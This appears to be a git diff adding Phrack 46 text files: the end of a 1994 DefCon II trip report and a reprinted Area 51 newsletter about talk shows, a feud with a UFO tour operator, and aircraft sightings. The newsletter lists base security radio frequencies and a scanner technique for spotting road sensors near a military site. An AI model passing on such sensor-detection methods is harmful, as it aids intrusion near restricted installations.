+make  them  Communists (in 1950 it did), just  not  full  fledged 
+capitalist  pigs themselves yet.  Soon come.  Vis a vis  Ludwig's 
+comment on the asset-deprived audience.  Soon come, man.
+
+"We go after BBS's that store illegal software."
+
+"So you're gonna put Compuserve in jail?"  Big, big applause.  
+
+Despite the openly verbal animosity between the free-ware believ
+ers  and  the Chief Software Cop, the spirited  and  entertaining 
+disagreements  maintained a healthy good natured tone  that  well 
+exceed Peter's time limit, as DefCon II was coming to a close.  
+
+It was time for one more stand up comedy attempt by a short haired 
+bandanna wearing hippie/hacker/phreak who was not quite up to the 
+job.
+
+"OK,  guys.   We've had some fun at the  Feds  expense.   They're 
+people, too.  So, from now on, it's Hug a Fed.  Go on, find a fed 
+and go up to him or her and big them a great big bear hug full of 
+love."  The Feds that had been busted were gone.  The ones  still 
+successfully  undercover weren't about to blow it for a quick  feel 
+from a horny teenager.
+
+Next.   The Cliff Stoll doll with an assortment of accessory  yo-
+yos  was a popular item. It was thrown pell-mell into the  crowds 
+who  leapt at it with a vengeance like a baseball bleachers  sec
+tion awaiting the 61st home run.
+
+"There  used to be a Wife of Cliff Stoll doll, but no one's  seen 
+it  in two years."  Cliff is strange.  I don't know if he's  that 
+strange, but it was a funny bit.
+
+"Then  we have the LoD/MoD action figure set starring Erik  Bloo
+daxe  and  Phiber Optik."  GI Joe action  set  gone  underground.  
+Corny,  but appreciated as hundreds of bodies dove to  catch  the 
+plastic relics tossed from the stage.
+
+If anything, an anti-climatic end to an otherwise highly informa
+tive  and  educational conference.  I can hardly wait  till  next 
+year  when, after word gets out, DefCon III will be  attended  by 
+thousands  of hackers and cops and narks who will try to  replay   
+the Summer of Cyber-Love '94 for a sequel.
+
+			* * * * * 
+
+More  than anything I wanted to get away from the  Sahara.   Away 
+from  its nauseatingly chromatic carpets, it's hundreds  of  sur
+veillance  cameras,  and  most of all, away  from  its  exploding 
+toilets.  
+
+We decided to play, and play we did at the new Luxor Hotel  which 
+is an amazing pyramid with 4000+ rooms. There are no elevators as 
+in  a pyramid 'going up' is kind of useless, so Inclinators  take 
+passengers  up  the  30 some odd floors to  hallways  which  ring 
+around the impossibly huge hollowed out pyramid shaped atrium.
+
+This was play land.  And for three hours we played and played and 
+went  to dumb shows that attract mid-western mamas  from  Noodnick, 
+Kentucky, alighting in Vegas  for their annual RV pilgrimage. But  
+we went and enjoyed none the less. 
+
+The "Live TV" show was anything but live except for lovely  Susan 
+who  hosted  us into the ersatz TV station.  Her job is  to  look 
+pretty,  sound pretty and warm up the crowd for an  over  budget, 
+overproduced schmaltz driven video projection that was to make us 
+all  feel like we were on stage with Dave.  Letterman,  that  is.  
+The effect does not work.  But we enjoyed ourselves, anyway.
+
+"Everyone here on vacation?"
+
+"No!" I yelled out.  Poor Susan was stunned.  No?  Why else would 
+you be here?
+
+"What  are  you doing?"  The TV audience of 500 was  looking  our 
+way.   Between the five of us we had a million dollars  (give  or 
+take) of electronic wizardry stuffed around us, beneath us and in 
+our laps.  
+
+"Working." Gee, I'm quick.
+
+"What  do you do?"  Susan asked with a straight face.  I bet  she 
+expected something like gas pumper, or nocturnal mortuary  forni
+cator or 7/11 clerk.
+
+"We're hacking for Jesus.  This is Cyber Christ!" I said pointing 
+at Erik Bloodaxe.
+
+Silence.  Dead silence again.  Sleep with Phil Zimmerman silence.  
+Except for us.  We giggled like school boys.  Psyche.
+
+"Ah,  .  . . that's nice." That was all she could come  up  with: 
+That's  nice.   So  much for ad libbing  or  deviating  from  the 
+script.   But  the TV audience enjoyed it.  A  whole  lot.   They 
+finally  figured out it was put on.  Not every one from the  Mid-
+West is as stupid as they all pretend to be.
+
+Then  it was time to get sick.  VR rides do me in, but not to  be 
+publicly  humiliated by my 20-something cohorts (and  Mike  Peros 
+with  whom I had to travel yet another 2000 miles that  night)  I 
+jumped right into an F-14 simulator which rotated 360 degrees  on 
+two gimbals for an infinite variety of nauseousness.
+
+"Oh, shit!" I yelled as I propelled myself forward and around and 
+sideways with sufficient g-force to disgorge even the most delec
+table meal.  "Oh, shit." I had reversed the throttle and was  now 
+spinning  end  over end backwards.  My inner ear was  getting  my 
+stomach  sick. "Oh, shit."  Out of the corner of my eyes my  four 
+pals  were  doubled over in laughter.  Had I barfed yet  and  not 
+known it?  God, I hope not.  "Oh, shit." I came to a dead  stand
+still,  the video screen showed me plummeting to earth at  escape 
+velocity and I pushed the throttle forward as roughly as I could.  
+An  innate survival instinct came in to play.  "Oh,  shit!"   The 
+virtual  aircraft  carrier  came into sight and  after  almost  2 
+minutes of high speed rotating revulsion, I was expected to  land 
+this  spinning F-14 on a thimble in the ocean.  Right.  I  tried, 
+and damned if I didn't make it.  I have no idea how, but I got an 
+extra  34,000  points  for a safe  landing.  120  seconds.  Ding.  
+Time's up.
+
+I got out of the simulator and spilled right onto the floor;  one 
+42  year old pile of humanity who had navigated nausea but  whose 
+balance  was  totally beyond repair. "Could anyone  hear  me?"  I 
+asked from my knees.
+
+"They were selling tickets."
+
+"Do I get my money back?"
+
+Onto  the  VR race cars.  I really thought I'd throw  up  to  the 
+amusement  of a thousand onlookers. Hacking then  phreaking  then 
+flying  and  now  driving.   I put the pedal  to  the  metal  and 
+crashed.  The huge video display has me tipping end over end  and 
+the  screen  is  shaking and the car I'm  driving  is  shuddering 
+violently but my brain can't compute it all.  I'm gonna wretch, I 
+just  know  it.  But I keep on driving,  decidedly  last  against 
+people  who haven't been handicapped with an inner ear so  sensi
+tive I get dizzy when I watch a 5" black and white TV.
+
+We  tilted out of there and alas, it was time to find  a  200,000 
+pound of metal to glide me home. It was a damn good thing I hadn't 
+eaten  before VR Land, but I wolfed down $3 hot dogs at the  air
+port  knowing  full well that whatever they served on  the  plane 
+would be a thousand times worse.  So Mike and I munched,  leaving 
+Cyber Christ and friends to battle the press and the stars at the 
+opening of Planet Hollywood at Caesar's Palace.
+  
+And then an unexpected surprise. Lisa and friend; our first class 
+objects of flirtation from the outbound trip which seemed like  a 
+month ago, appeared.  But we were all so wiped out that a  conti
+nent of innuendo turned into a series of short cat naps.  We  got 
+a  few  flirts  in,  but nothing to write home  about.  Red  Eye   
+flights are just not what they're cracked up to be.  
+
+As  I  crawled into bed at something like 7AM  Eastern,  my  wife 
+awoke  enough to ask the perennial wife question.  "What did  you 
+do  all weekend?"  I, in turn, gave her the usual  husbandly  re
+sponse.
+
+"Oh, nothing.  Good night, Gracie."
+
+			* * * * * 
+
+(C) 1994 Winn Schwartau
+Winn  Schwartau is an information security  consultant,  lecturer 
+and, obviously, a writer.  Please go buy his new book:  "Informa
+tion Warfare: Chaos on the Electronic Superhighway." Available at 
+book   stores  everywhere.   Winn  can  be  reached  at:   Voice: 
+813.393.6600 or E-mail: P00506@Psilink.com
diff --git a/phrack46/21.txt b/phrack46/21.txt
new file mode 100644
index 0000000..9695585
--- /dev/null
+++ b/phrack46/21.txt
@@ -0,0 +1,897 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 21 of 28
+
+****************************************************************************
+
+[Several of us had plans to tempt fate and join the other pop-culture
+ lemmings running off to Area 51 during Defcon.  The not-so-secret
+ base has seen more press this year than Madonna.  Armed with
+ our ICOM 2SRAs and a copy of "The Area 51 Viewer's Guide"
+ we planned to put our lives on the line purely for the sake of
+ being able to say "We were there!"
+
+ The night before we were planning on going, FOX-TV broadcast
+ an episode of "Encounters" that focused heavily on Area 51.
+ The thought of tromping off on our little recon adventure
+ accompanied by winnebago-loads of families taking the kids
+ to see "that dang UFO place from the TV," just sorta ruined
+ the mood.
+
+ Hopefully, this won't happen to you.  And if you do go,
+ you really should consider getting the "viewer's guide"
+ from Glenn Campbell (psychospy@aol.com).  Email him for
+ a catalog of Area 51 stuff.
+
+ Glenn also publishes an electronic mag documenting recent activities
+ surrounding Area 51, and related activities.  With his permission,
+ Phrack is extremely please to bring you the latest issue of
+ "The Groom Lake Desert Rat."
+
+-----------------------------------------------------------------------------
+
+THE GROOM LAKE DESERT RAT.   An On-Line Newsletter.
+Issue #15.  Sept. 2, 1994.
+ -----> "The Naked Truth from Open Sources." <-----
+AREA 51/NELLIS RANGE/TTR/NTS/S-4?/WEIRD STUFF/DESERT LORE
+Written, published, copyrighted and totally disavowed by 
+psychospy@aol.com. See bottom for subscription/copyright info.
+
+In this issue...
+     SUBTLETIES OF THE TELEVISION TALK SHOW, PART I
+     NEW AIR FORCE STATEMENT ON GROOM
+     EG&G TO ABANDON TEST SITE
+     JANET "N" NUMBERS
+     JANET HANDOFF FREQUENCIES
+     GROOMSTOCK '94
+     SOUND FAMILIAR?
+     CAMPBELL ARRAIGNED
+     LARRY KING NOT CLONED?
+     MYSTERIOUS SIGN DISAPPEARANCE
+     INTEL BITTIES
+
+[Note: This file ends with "###".]
+
+ ----- MEDIA COMMUNICATIONS 103A -----
+
+SUBTLETIES OF THE TELEVISION TALK SHOW, PART I
+
+In DR #10, we reviewed the major news media--print, radio and 
+television--and showed how each could twist reality in their own 
+special way.  Strictly for the sake of science, Psychospy allowed 
+himself to be turned into a minor media celebrity so we could 
+report to our readers the sometimes dubious processes behind the 
+scenes.  There was a limit, however, to how low we would sink in 
+the pursuit of knowledge.  We would not take off our clothes for 
+the camera, and we would not place ourselves in any situation 
+where our credibility, reputation or dignity could be seriously 
+trashed. 
+
+Now we can report that this barrier has been broken.  In the next 
+two issues of the Rat we will recount our first-hand experiences 
+with the lowest form of mass media, the television talk show.
+
+ ..... THE MEDIUM OF TALK .....
+
+Talk shows come in three basic formats.  The rarest but most 
+respectable is the SERIOUS ISSUES talk show exemplified by "Meet 
+the Press," "Nightline" and the roundtable discussions on PBS--
+maybe even "Larry King Live."  They are dignified and serious, 
+explore meaningful political and societal issues, and hardly 
+anyone watches them.
+
+The next rung down the ladder--vapid but benign--is the CELEBRITY 
+CHAT talk show, like the "The Tonight Show," "Late Show with David 
+Letterman" and "Arsenio Hall."  Movie stars and Big Money authors 
+pump their latest work in a non-confrontational environment 
+designed only to promote laughs.
+
+The last and lowest form of the genre is the HUMAN CONFLICT talk 
+show.  These syndicated programs always bear the name of the host, 
+like  "Oprah," "Geraldo," "Vicky" or "Leeza."  He or she is a 
+charismatic and camera-loving character, no doubt ruthless in real 
+life, but blessed with the ability to convey warmth and sincerity 
+on TV.  The fodder for these shows is a steady diet of human 
+suffering, crises, angst and tragedy.  Former spouses and 
+estranged friends face off against each other; grown men and women 
+reveal to the parents their until-now-hidden perversities, and 
+human oddities of all shapes and sizes present themselves for 
+humiliation before a nationwide audience.  The ultimate goal of 
+these shows is the public expression of private feelings.  They 
+seek tears, anger, jealousy and graphic self-immolation recorded 
+by the camera on a tight close-up.  With a dozen such shows now in 
+syndication, the competition is intense to seek out new forms of 
+conflict and expose the latest narcissistic trends.
+
+Talk shows are produced "live on tape" with minimal editing, and 
+this presents special problems for a guest.  In other forms of 
+television, sound bites rule the show.  It may seem artificial, 
+but tight editing at least assures that each party has their say 
+and only their finest bon mot will be used.  The courteous speaker 
+with a few good ideas can confidently compete with any 
+extravagant, microphone-hogging blowhard, because most of what the 
+blowhard says will be cut.  In the almost-live talk show, the more 
+reasonable speaker has to compete with the blowhard head on.  
+There is no time for an orderly presentation of evidence; he who 
+makes the most outrageous, confident and colorful claims, 
+groundless or not, gains the camera's eye and controls the game.
+
+If you have any shred of personal dignity and are asked to be a 
+guest on a Human Conflict show, the best response is obvious:  
+"Just Say No."  Unless you are a masochist or a natural born 
+actor, there is no way you can win in this format.  We know it 
+now; we knew it then, but sometimes, like Oedipus, you just can't 
+stop the inevitable march of Fate....
+
+ ..... ONWARD TO HUMILIATION .....
+
+The path to our own downfall was indirect.  For several months, a 
+number of journalists have been making the pilgrimage to Freedom 
+Ridge, and we generally escort them as a sort of local public 
+relations representative.  We do not charge for this service, and 
+we do not discriminate between journalists.  If TASS or Penthouse 
+or the Podunk Review came to call, we would treat them no 
+differently than the New York Times.
+
+In May, we got a call from a producer from the Montel Williams 
+Show, one of the Human Conflict shows that we had never seen.  It 
+seems that "Montel," as he is known to the world, had promised on 
+an earlier talk show that he would visit the border of Area 51.  
+We told the producer that we would be willing to escort Montel and 
+his crew to Freedom Ridge to tape a segment, but we declined an 
+offer to come to New York to appear on the studio show.  Montel's 
+visit was originally scheduled for May 5 but was canceled at the 
+last minute, and we breathed a sign of relief.
+
+In August, the project was reactivated, we suspect as the result 
+of the June 22 article in the New York Times.  Montel's visit was 
+scheduled for Aug. 16, and we were again asked if we would go to 
+New York to appear on the later show.  Again, we declined.
+
+When Montel came to Rachel, he brought a Humvee, his producers and 
+a film crew.  We went through the usual script for the camera:  
+Montel drives up to our Research Center, and we meet him in the 
+driveway.  Inside, we show him where we are going on the map, then 
+we get in the car and drive the rugged road to Freedom Ridge.  We 
+had done it before with countless crews, but never so quickly and 
+in so few "takes."  When Montel arrived, there was no question 
+that he was in charge.  He asked no significant questions, and 
+showed no particular interest in the secret base itself.  We 
+sensed that he came only because he said he would and that his 
+primary aim was to film a sound bite on the ridge that said, "You 
+see, I did what I promised."
+
+As we rode down from Freedom Ridge in the Humvee with Montel and 
+the producer, we were again asked if we would come to New York to 
+appear on the talk show the following week, Aug. 23.  We hesitated 
+and were about to turn down the offer cold, when the producer 
+uttered the only horrible words that could force us to comply.
+
+Sean David Morton.
+
+ ..... THE EMBODIMENT OF EVIL .....
+
+We first learned of Sean Morton over two years ago, before we came 
+to Rachel.  We had heard his enthusiastic endorsement of the Black 
+Mailbox on a UFO video:
+
+   "Probably the most amazing thing about Area 51 is the fact that 
+this is literally the only place in the world where you can go out 
+and actually see flying saucers on a timetable basis.  You can 
+literally go out there on a Wednesday night between about seven 
+and one a.m. and you'll see these things flying up and down the 
+valley.  It's absolutely amazing.  On even a bad night you'll have 
+ten, eleven, twelve sightings.  On a good night--and I've been out 
+there with friends of mine camping--on a good night the sky will 
+just rip open with these things.  You'll see anywhere between 
+twenty to forty objects in a night testing over the base for 
+anywhere from fifteen and forty minutes at a time."
+
+We've lived near the border for over a year and a half now, are 
+genuinely interested in UFOs and have spent countless days and 
+nights in the desert; yet we haven't seen even ONE flying saucer, 
+let alone scores.  The logical explanation is that we arrived too 
+late, after the saucers had been packed up and moved elsewhere.  
+The trouble with this theory is that during the early part of our 
+tenure, Sean Morton continued to bring tours to the area--at $99 a 
+head--and reported UFOs everywhere.
+
+In one celebrated incident in March 1993, Psychospy spent the 
+night on White Sides, overlooking Groom Lake, with some aviation 
+watchers and a writer from Popular Science.  We were looking for 
+the alleged Aurora spyplane--almost as ephemeral as flying 
+saucers--but we saw nothing more than a few satellites, some 
+distant aircraft strobes and an occasional meteor.  The following 
+was reported in the March 1994 Popular Science....
+
+   "Last March, three chilly airplane watchers with binoculars 
+atop White Sides Mountain at this magic hour [4:45am] were 
+tracking a 737 airliner approaching Groom Lake, as a fourth member 
+of their group thawed out in his truck below.  Parked on a knoll, 
+he was next to a vanload of UFO seekers.  They were lead by tour 
+operator Sean Morton, whose leaflet described him as 'the world's 
+foremost UFO researcher.'
+
+   "Morton donned a horned Viking helmet and from time to time 
+pointed to the sky, exclaiming: 'Look at that one!'  The airplane 
+watcher trained his binoculars in the same direction but saw 
+nothing out of the ordinary.  Later, Morton's group became excited 
+by what they perceived as an entire formation of UFOs; the 
+airplane watcher's lenses revealed only stars.  Finally, as the 
+morning's first 737 made its gentle approach toward Groom Lake at 
+4:45, the UFO enthusiasts rejoiced at Old Faithful's appearance.  
+Everyone had seen exactly what they hoped for."
+
+In the beginning, when we were new to the area, we were generous 
+to Sean and called him "fantasy prone."  As we got to know him 
+better and gained confidence in our own knowledge base, we came to 
+mince no words.  Sean is a deliberate con man.  He recognizes as 
+well as us the landing lights of a 737, but he knows that others 
+can be fooled and taken for a $99 ride to see them.  If anyone is 
+spreading disinformation about Area 51, filling the air with noise 
+to make the truth harder to grasp, it isn't sinister government 
+agents; it's Sean David Morton pursuing only his own greed and 
+self-aggrandizement.
+
+We have worked hard over the past 18 months to undo the damage 
+Sean has done and displace him from the Area 51 scene.  
+Discrediting Sean isn't complicated:  We simply quote his own 
+words whenever we can.  Sean is a broadly diversified charlatan, a 
+self-proclaimed expert in faith healing, earthquake prediction, 
+psychic prophesy and virtually every other New Age fad.  We have 
+no problem at all with him plying his trade within the confines of 
+the state of California where he justly belongs, but when he 
+proclaims himself the foremost authority on Area 51, we get 
+territorial.  We hope that our "Area 51 Viewers Guide" has reduced 
+the gullibility of newcomers and made the environment less 
+attractive for leeches like him.  In fact, we haven't had a 
+confirmed Morton sighting near the border in over a year.  We 
+heard from sources in California that he no longer gave tours to 
+Area 51 because the saucers had been moved elsewhere--which was 
+fine by us.
+
+The saucers must have returned, however.  As the recent Groom Lake 
+publicity reached its peak, "The World's Foremost UFO Researcher" 
+could not help but resurface to suck energy from it.  In recent 
+months, reports began to reach us that he had appeared as an Area 
+51 expert at UFO conferences, on radio talk shows and on the 
+Montel Williams Show.  
+
+In the latter appearance, which was first broadcast in December 
+1993, Sean showed video footage of nighttime "UFOs" that he said 
+he photographed "at great risk to my own life."  As we viewed them 
+later, one clip showed an isolated circle of light jumping around 
+within the frame.  It could have been any stationary out-of-focus 
+light shot through a hand-held video camera.  Notches seen on the 
+top and bottom of the "disk" correspond to protrusions inside the 
+lens assembly.  In the other clip, only slightly out of focus, we 
+saw the lights of a 737 landing on the Groom Lake airstrip.  To 
+Sean, it was "an object actually coming in from space."  The time 
+stamp in the corner said "4:49 am."
+
+It was on this show that Montel promised to visit Area 51 escorted 
+by Sean; yet when Montel finally made the trip eight months later, 
+Sean was not invited.  The producer told us that word had reached 
+him from many sources that Sean was considered a fraud, that in 
+addition to UFOs he also did psychic prophesies and that his 
+claimed credentials were highly dubious.  He and Montel felt that 
+Sean had taken advantage of them and that by having him on the 
+show they had inadvertently legitimized him.
+
+But none of that prevented them from inviting him back as a guest 
+the second studio show.
+
+As we rode down in the Humvee from Freedom Ridge with Montel and 
+the producer, the reality to us became crystal clear:  If we did 
+not appear on the Montel Williams Show, then Sean would have the 
+stage all to himself and could continue to spread any sort of 
+nonsense about Area 51.  We felt that we had no choice.  Either we 
+did battle with this guy now, before he grew bigger, or we would 
+be cleaning up his mess for many months to come.
+
+ ..... OUR RAPID EDUCATION .....
+
+We had less than a week to prepare for the big show--nowhere near 
+enough time to do all the research we needed.  The first item of 
+business was to actually watch the Montel Williams Show and 
+familiarize ourselves with the format.  We cranked up our 
+satellite dish and surfed through the channels.  On "Donahue":  
+"Six Year Olds Who Sexually Harass Other Six Year Olds."  On 
+"Rolanda, a related topic:  "Will Your Child Grow Up To Be A 
+Serial Killer?"  On "The Vicky Show," we heard that Sean Morton 
+had just appeared as an expert on the prophesies of Nostradamus, 
+but we were unable to catch that one.
+
+The first Montel Williams Show we saw was, "Mistresses Who Want To 
+End The Affair."  On the stage, three women disguised by dark 
+sunglasses explained why they had been attracted to married men.  
+We could only tolerate about ten seconds at a time of this show, 
+but when we tuned back, we found that the women had shed their 
+sunglasses and revealed their true identities.  Presumably, they 
+had also revealed, or at least seriously compromised, the 
+identities of the men they had been having the affairs with.  When 
+we tuned in again later, one of the three was having an angry 
+argument with a fourth female guest.  We guessed that this was the 
+wife of one of the married men.
+
+A friend sent us a tape of Montel's original UFO show in which 
+Sean appeared as a "UFO Investigator" and Montel promised to 
+visit.  The show included an abductee, a witness to the "Kecksburg 
+Incident," a former actress, WFUFOR Sean David Morton, a requisite 
+skeptic, a pro-UFO filmmaker and--as if you hadn't guessed--that 
+talk show regular Travis Walton.  The show was conducted in the 
+"expanding chairs" format.  It started out with two guests alone 
+on the stage, then more guests and chairs were added during each 
+commercial break until there were seven chairs and seven 
+squabbling speakers vying for attention on the platform.  In this 
+format, attention is diluted with each new chair, so the people 
+who appear last, typically the skeptics, usually get only a few 
+seconds of airtime.  During the free-for-all of a seven-person 
+debate, the camera always focuses on the most aggressive and 
+charismatic guest--i.e. Sean David Morton.
+
+The last chair to be filled was occupied by filmmaker Russ Estes, 
+who the on-screen caption said, "Does Not Believe In UFOs."  This 
+is false.  He is a disciplined UFO investigator who has devoted 
+his career to making films on the subject, as well as exposing 
+obvious frauds.  What is true is that he "Does Not Believe In Sean 
+Morton."  In his few seconds of air time, he raised doubts about 
+one of Morton's many fake credentials, his claimed "Doctor of 
+Divinity" degree.
+
+RUSS ESTES:  "Montel, my biggest problem, and this is what I've 
+run into over and over again, is the quality of the individual who 
+is bringing me the message.  You know, the-boy-that-cried-wolf 
+syndrome is phenomenal in this field.  You get people out there 
+who are saying, I'm this, I'm that, and I hate to do this to you, 
+Sean, but here's a guy right here who claims to be the Doctor, 
+Reverend Sean David Morton.  In his own biography, he claims to 
+have gotten his Doctor of Divinity at--excuse me, it will take me 
+one second...."
+
+SEAN MORTON:  "Berachah University."
+
+RUSS ESTES:  "Berachah University, Houston, Texas--the Berachah 
+Church.  I called them.  They don't have any type of degrees that 
+they give.  They have Bible study at the best.  He claims to have 
+attended University of Southern California...."
+
+MONTEL WILLIAMS:  "So the point that you are making, Russ, is that 
+there's a problem with the messenger, so therefore the message is 
+not real."
+
+RUSS ESTES:  "How can you believe the message if the people lie to 
+you from the start."
+
+SEAN MORTON:  "The thing I'd like to point out about Mr. Estes 
+here is that if you don't like the message, you can shoot the 
+messenger, and it's obvious to me that in the UFO field, we do 
+this for free, we do this because we want to know the truth, 
+because we have seen something...."
+
+RUSS ESTES:  "But does that mean you bogey up your credentials?"
+
+SEAN MORTON (angry):  "That is not true.  You are flat-out lying 
+to these people.  I went to USC for four years."
+
+Just then, the debate was cut off by a sloppy edit, and Sean's USC 
+diploma appeared on the screen.  
+
+After watching the tape, we contacted Russ Estes.  He said that 
+the debate between he and Sean went on much longer than was shown 
+on the screen.  "Live on tape" does not mean totally unedited.  
+This show went on for over two hours to obtain a one hour's worth 
+of material.  Sometimes, whole shows are thrown out when they 
+don't work.  Unfortunately, Estes made a misstep on the USC 
+degree.  As it turns out, this is just about the only authentic 
+credential he has: a B.A. in Drama and Political Science.  We 
+certainly believe the Drama part:  It's the last degree he ever 
+needed.
+
+The Doctor of Divinity degree is still phony, but in the talk show 
+world, evidence counts for nothing; only emotions and presentation 
+matter.  Sean walked away from the show as a brave and 
+knowledgeable crusader, legitimized by a promise from Montel to 
+take his tour, and with the implied invitation to reappear on the 
+show.  Estes walked away alone, wasn't invited to return, and has 
+since had to live down the "Does Not Believe in UFOs" moniker.  
+Sean even had the delightful gall to send Estes a letter, through 
+the producers...
+
+ ---
+
+Mr. Russ Estes
+c/o Alex Williams [sic]
+The Montel Williams Show
+1500 Broadway Suite 700
+New York, New York, 10036
+
+Dear Russ:
+
+I am going to assume that you are not a bold faced liar who is out 
+for some kind of warped revenge, or a person who is just trying to 
+make a buck off baseless slander.
+
+Let's try to solve this like gentlemen - enclosed is a copy of my 
+U.S.C. diploma.  I have also called the school and my records are 
+intact.  The rest of your "research" on me is equally faulty.
+
+I hope this solves out problem.  If not, I have consulted my 
+attorney and any further slander directed toward me through your 
+video series or elsewhere, will result in action taken against 
+you.
+
+Yours Truly,
+[BIG signature]
+Sean Morton
+
+ ---
+
+Things were beginning to look grim for Psychospy.  With the time 
+of the taping drawing near, we hadn't even begun to scratch the 
+surface of Sean David Morton and his path of destruction.  Talking 
+to our contacts, we saw that Sean had accumulated a vast audience 
+of intimate enemies, more than we could possibly contact.  If Sean 
+sounds knowledgeable and occasionally has some meaningful 
+information, it is because he has ripped it off from others.  We 
+were amused to find that there was even an reputable astrologer 
+who hated Sean, who felt that Sean had stolen his predictions and 
+passed them off as his own.
+
+It seemed a futile exercise anyway.  We knew all the evidence in 
+the world wasn't going to matter when we actually faced off 
+against Sean on camera.   We were leaving behind our own 
+comfortable medium of logic and data and stepping into his home 
+turf--the talk show--where presentation counts more than content.  
+We were obligated by our own ethics to speak only the simplest 
+truths and the cautious assertions supported by data.  Sean David 
+Morton, bold faced liar that he is, faced no such constraints.  He 
+could spout any lie he wanted to sound important and get himself 
+off the hook, and the only thing that mattered here was that he 
+said it with apparent sincerity and that it held up for 
+television's thirty second attention span.  We knew that if we 
+started to make an accusation about him, he would instantly sense 
+the winds and make the same one against us with greater force.  
+The ensuing argument would make he and us appear to be equals.
+
+Sean knew all the buzzwords and cliches of the UFO movement and 
+could spout the conventional wisdom much faster than we could.  He 
+knew how to sound sincere and reasonable and adapt instantly to 
+the sentiments of any social circumstance.  He was well-practiced 
+at responding to inquisitions and had emerged from many without a 
+scratch.  Opposing him, all we had was a body of mundane knowledge 
+about a very limited area of the desert.  Sean was smooth and 
+well-honed in his talk show delivery, and we were stumbling in for 
+the first time to a medium where we really didn't want to be.
+
+It was with these reservations and a sense of dark foreboding that 
+we packed our bags and headed for New York City.  There, in Times 
+Square, we expected a titanic battle between Good and Evil, and 
+things didn't look good for Good.
+
+[To be continued in Desert Rat #16....]
+
+ ----- NEW AIR FORCE STATEMENT ON GROOM -----
+
+The following statement was recently released to inquiring 
+journalists by the Nellis AFB public affairs office.  (We 
+requested our own copy from Major George Sillia on Aug. 26.)  It 
+represents a significant shift from the previous "We know nothing 
+about Groom Lake" response.
+
+   "There are a variety of facilities throughout the Nellis Range 
+Complex.  We do have facilities within the complex near the dry 
+lake bed of Groom Lake.  The facilities of the Nellis Range 
+Complex are used for testing and training technologies, 
+operations, and systems critical to the effectiveness of U.S. 
+military forces.  Specific activities conducted at Nellis cannot 
+be discussed any further than that."
+
+That's a step in the right direction.  What the base needs now is 
+a name and a history.  For example, tell us about the U-2 and A-12 
+programs at Groom in the 1950s and 1960s.  That's not very secret 
+or critical to our current defense, so what's the point in 
+pretending it is?  Will the Air Force take control of the 
+situation and provide this information itself, or will the void be 
+filled by a dozen aggressive entrepreneurs?
+
+We'd bet our money on the entrepreneurs.
+
+ ----- EG&G TO ABANDON TEST SITE ----
+
+According to an 8/26 article in the Las Vegas Review-Journal, EG&G 
+and its REECo subsidiary will not seek renewal of their Nevada 
+Test Site contract when it expires in 1995.  These are two of the 
+three companies that have managed the nuclear testing ground since 
+its inception.  It is unclear whether this action will have any 
+affect on operations at the adjoining Groom Lake base, where EG&G 
+and REECo are also assumed to be major contractors.  
+
+Recent rumors say that EG&G no longer operates the "Janet" 737 
+jets that shuttle workers to Groom and Tonopah.  That operation 
+has supposedly been taken over by the Air Force, using the same 
+aircraft and possibly the same staff.
+
+ ----- JANET "N" NUMBERS -----
+
+For aircraft watchers, here are the registration and serial 
+numbers of Janet 737s and Gulfstream commuter planes spotted at 
+the Janet terminal at McCarran airport.  Based on observations in 
+5/94 and the 4/30/94 FAA registry.  One or more of the Janet 
+aircraft are probably missing from this list.  (We ask our readers 
+to find them.)
+
+Boeing 737...
+Reg. #/Serial #/Owner
+N4508W  19605  Great Western Capital Corp, Beverly Hills
+N4510W  19607  Great Western Capital Corp, Beverly Hills
+N4515W  19612  Great Western Capital Corp, Beverly Hills
+N4529W  20785  First Security Bank of Utah, Salt Lake City
+N5175U  20689  Dept. of the Air Force, Clearfield UT
+N5176Y  20692  Dept. of the Air Force, Clearfield UT
+N5177C  20693  Dept. of the Air Force, Clearfield UT
+
+Gulfstream C-12...
+N20RA   UB-42  Dept. of the Air Force, Clearfield UT
+N654BA  BL-54  Dept. of the Air Force, Clearfield UT
+N661BA  BL-61  Dept. of the Air Force, Clearfield UT
+N662BA  BL-62  Dept. of the Air Force, Clearfield UT
+
+ ----- JANET HANDOFF FREQUENCIES ----
+
+A DESERT RAT EXCLUSIVE!  Published here for the first time are the 
+air traffic control frequencies for the "Janet" 737 crew flights 
+from Las Vegas McCarran Airport to Groom.  The McCarran freqs are 
+public, but the Groom ones have not been revealed until now.  Air 
+traffic control broadcasts are "in the clear" and any scanner 
+radio should be able to pick them up.  Each of these freqs has 
+been personally confirmed by Psychospy or a close associate.
+
+121.9   McCarran Ground Control
+119.9   McCarran Tower
+133.95  Departure Control
+119.35  Nellis Control
+120.35  Groom Approach
+127.65  Groom Tower
+118.45  Groom Ground
+
+Here are some other Groom freqs (some of which were previously 
+reported in DR #8).  The security frequencies are usually 
+scrambled, but not always.
+
+418.05  Cammo Dudes (primary)
+408.4   Cammo Dudes (repeat of 418.05)
+142.2   Cammo Dudes
+170.5   Cammo Dudes (Channel 3)
+138.3   "Adjustment Net" (seems related to security)
+261.1   Dreamland Control (published)
+255.5   Groom Tower (repeat of 127.65)
+154.86  Lincoln County Sheriff
+496.25  Road sensors on public land
+410.8   Pager (apparently from Groom but unconfirmed)
+
+The most accurate way to detect a road sensor (AFTER you have 
+tripped it), is to program 496.25 into several channels of your 
+scanner, then scan those channels exclusively as you are driving.  
+When the scanner stops on one channel, you have just passed a 
+sensor.
+
+ ----- GROOMSTOCK '94 -----
+
+The "Freedom Ridge Free Speech Encampment" went pretty much as 
+planned, with at least sixty people in attendance but not all of 
+them staying for the night.  There were no surprises and, sadly, 
+no confrontations with the authorities when we whipped out our 
+cameras and pseudo-cameras to point at the secret base.  The Cammo 
+Dudes were visible but kept their distance, and the only authority 
+figure to show up on the ridge was a BLM Ranger in a Smoky-the-
+Bear hat.  He was concerned only that we clean up our trash, and 
+he warned us, by his very presence, that "Only You Can Prevent 
+Forest Fires."
+
+The event was recorded in an 8/29 article in the Las Vegas Review-
+Journal, which dubbed it "Groomstock."  [The article may be 
+available at the FTP site.]  We were disturbed to read in the 
+paper that the attendees included some "marijuana-smoking 
+slackers."  We called around and found out it was true and that it 
+happened after Psychospy went to bed.  Had we known, we would have 
+quashed it immediately.  This sort of thing discredits our ability 
+to police ourselves and hurts the reputation of the land grab 
+opponents.
+
+The hot gossip around the campfire was about the Review-Journal 
+reporter and the loony in the tie-dyed shirt.  The loony had spent 
+about an hour moving rocks and dirt around to make himself a 
+comfortable bed, then he blew a conk-shell horn and banged cymbals 
+together to bless it.  When the reporter arrived, he volunteered 
